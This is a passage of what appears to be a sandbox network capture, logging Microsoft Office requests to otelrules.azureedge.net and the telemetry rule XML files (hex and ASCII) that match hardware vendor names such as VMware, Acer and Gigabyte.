                                                                                                                                      2024-11-29 22:11:06 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      43192.168.2.44979513.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:05 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:06 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 407
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                      ETag: "0x8DC582B9698189B"
                                                                                                                                      x-ms-request-id: 72388ca2-901e-0029-4711-41274a000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221106Z-174f7845968pght8hC1EWRyvxg00000003mg00000000ha3v
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:06 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      44192.168.2.44979713.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:07 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:07 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 415
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                      ETag: "0x8DC582BA41997E3"
                                                                                                                                      x-ms-request-id: 106d127d-401e-008c-1a91-3f86c2000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221107Z-174f7845968swgbqhC1EWRmnb400000010sg000000003f88
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:08 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      45192.168.2.44979813.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:07 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:08 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 477
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                      ETag: "0x8DC582BB8CEAC16"
                                                                                                                                      x-ms-request-id: f9751f86-801e-0035-08a1-42752a000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221108Z-174f7845968j6t2phC1EWRcfe800000010rg000000005w5b
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:08 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      46192.168.2.44979913.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:07 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:08 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 464
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                      ETag: "0x8DC582B97FB6C3C"
                                                                                                                                      x-ms-request-id: a99e6065-701e-006f-4d91-3fafc4000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221108Z-174f7845968vqt9xhC1EWRgten00000010g000000000gt3q
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:08 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      47192.168.2.44980013.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:08 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:08 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 494
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                      ETag: "0x8DC582BB7010D66"
                                                                                                                                      x-ms-request-id: 5e69cd2e-d01e-002b-6bff-4125fb000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221108Z-174f7845968pf68xhC1EWRr4h800000010r000000000fszk
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:08 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      48192.168.2.44980213.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:09 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:10 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 472
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                      ETag: "0x8DC582B9DACDF62"
                                                                                                                                      x-ms-request-id: b18988de-c01e-0079-2891-3fe51a000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221110Z-174f78459685m244hC1EWRgp2c000000108000000000pa81
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:10 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      49192.168.2.44980313.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:10 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:10 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 404
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                      ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                      x-ms-request-id: f5c4af5a-301e-005d-6385-3fe448000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221110Z-174f7845968xlwnmhC1EWR0sv800000010f0000000001m1e
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:10 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      50192.168.2.44980413.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:10 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:11 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:10 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 468
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                      ETag: "0x8DC582B9C8E04C8"
                                                                                                                                      x-ms-request-id: 10a56a44-001e-00ad-35fa-41554b000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221110Z-174f78459684bddphC1EWRbht4000000106000000000kve3
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:11 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      51192.168.2.44979613.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:11 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      52192.168.2.44980513.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:12 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:12 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:12 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 428
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                      ETag: "0x8DC582BAC4F34CA"
                                                                                                                                      x-ms-request-id: 14e4a643-101e-007a-3c66-40047e000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221112Z-174f7845968cdxdrhC1EWRg0en00000010f000000000d2nf
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:12 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      53192.168.2.44980613.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:12 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:12 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 499
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                      ETag: "0x8DC582B98CEC9F6"
                                                                                                                                      x-ms-request-id: 89e88ad2-001e-0065-4491-3f0b73000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221112Z-174f7845968px8v7hC1EWR08ng00000010v00000000053b4
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
